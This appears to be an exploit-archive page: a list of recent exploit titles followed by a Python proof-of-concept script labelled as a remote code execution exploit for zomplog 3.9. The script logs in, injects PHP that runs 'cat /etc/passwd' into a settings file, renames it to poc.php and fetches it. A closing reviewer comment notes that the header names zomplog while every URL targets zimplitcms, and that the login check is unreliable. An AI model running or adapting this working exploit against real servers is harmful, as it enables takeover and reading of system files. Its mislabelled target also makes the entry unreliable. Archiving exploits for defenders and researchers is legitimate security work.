
22 changes to exploits/shellcodes/ghdb Keeper Security desktop 16.10.2 & Browser Extension 16.5.4 - Password Dumping Active Super Shop CMS v2.5 - HTML Injection Vulnerabilities Availability Booking Calendar v1.0 - Multiple Cross-site scripting (XSS) Dooblou WiFi File Explorer 1.13.3 - Multiple Vulnerabilities Joomla HikaShop 4.7.4 - Reflected XSS Joomla VirtueMart Shopping Cart 4.0.12 - Reflected XSS mooDating 1.2 - Reflected Cross-site scripting (XSS) October CMS v3.4.4 - Stored Cross-Site Scripting (XSS) (Authenticated) PaulPrinting CMS - (Search Delivery) Cross Site Scripting Perch v3.2 - Persistent Cross Site Scripting (XSS) RosarioSIS 10.8.4 - CSV Injection WordPress Plugin AN_Gradebook 5.0.1 - SQLi Zomplog 3.9 - Cross-site scripting (XSS) zomplog 3.9 - Remote Code Execution (RCE) copyparty 1.8.2 - Directory Traversal copyparty v1.8.6 - Reflected Cross Site Scripting (XSS) GreenShot 1.2.10 - Insecure Deserialization Arbitrary Code Execution mRemoteNG v1.77.3.1784-NB - Cleartext Storage of Sensitive Information in Memory Windows/x64 - PIC Null-Free Calc.exe Shellcode (169 Bytes)
58 lines
No EOL
1.9 KiB
Python
Executable file
#Exploit Title: zomplog 3.9 - Remote Code Execution (RCE)
|
|
#Application: zomplog
|
|
#Version: v3.9
|
|
#Bugs: RCE
|
|
#Technology: PHP
|
|
#Vendor URL: http://zomp.nl/zomplog/
|
|
#Software Link: http://zomp.nl/zomplog/downloads/zomplog/zomplog3.9.zip
|
|
#Date of found: 22.07.2023
|
|
#Author: Mirabbas Ağalarov
|
|
#Tested on: Linux
|
|
|
|
|
|
import requests
|
|
|
|
#inputs
|
|
username=input('username: ')
|
|
password=input('password: ')
|
|
|
|
#urls
|
|
login_url="http://localhost/zimplitcms/zimplit.php?action=login"
|
|
payload_url="http://localhost/zimplitcms/zimplit.php?action=saveE&file=Zsettings.js"
|
|
rename_url="http://localhost/zimplitcms/zimplit.php?action=rename&oldname=Zsettings.js&newname=poc.php"
|
|
poc_url="http://localhost/zimplitcms/poc.php"
|
|
|
|
|
|
#login
|
|
session = requests.Session()
|
|
login_data=f"lang=en&username={username}&password={password}&submit=Start!"
|
|
headers={
|
|
'Cookie' : 'ZsessionLang=en',
|
|
'Content-Type' : 'application/x-www-form-urlencoded',
|
|
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36'
|
|
}
|
|
login_req=session.post(login_url,headers=headers,data=login_data)
|
|
|
|
if login_req.status_code == 200:
|
|
print('Login OK')
|
|
else:
|
|
print('Login promlem.')
|
|
exit()
|
|
#payload
|
|
payload_data="html=ZmaxpicZoomW%2520%253D%2520%2522%2522%253C%253Fphp%2520echo%2520system('cat%2520%252Fetc%252Fpasswd')%253B%253F%253E%2522%253B%2520%250AZmaxpicZoomH%2520%253D%2520%2522150%2522%253B%2520%250AZmaxpicW%2520%253D%2520%2522800%2522%253B%2520%250AZmaxpicH%2520%253D%2520%2522800%2522%253B%2520"
|
|
pheaders={
|
|
'Content-Type' : 'application/x-www-form-urlencoded',
|
|
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36'
|
|
}
|
|
payload_req=session.post(payload_url,headers=pheaders,data=payload_data)
|
|
|
|
#rename
|
|
|
|
rename_req=session.get(rename_url)
|
|
|
|
#poc
|
|
poc_req=session.get(poc_url)
|
|
print(poc_req.text)
|
|
|
|
|
|
#youtube poc video - https://youtu.be/nn7hieGyCFs |
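Review bot: The header names zomplog 3.9 as the affected product, but every URL in the `#urls` block targets `zimplitcms/zimplit.php`, so the entry is ambiguous about which application is affected; the header should name the product that owns these endpoints. The header also does not say that the flow needs valid credentials or what the weakness is: from the requests it appears to be an authenticated `action=saveE` write to `Zsettings.js` followed by `action=rename` to a `.php` name, with no restriction on the new extension. I would add a comment such as `# Requires valid credentials. Root cause (as exercised here): rename accepts an executable extension; fix by allowlisting extensions server-side.` For defenders, the sequence worth alerting on is a `saveE` request followed by a `rename` whose `newname` ends in `.php`. The `status_code == 200` test at the login step probably cannot tell a rejected login from an accepted one, so the 'Login OK' output should not be read as confirmation.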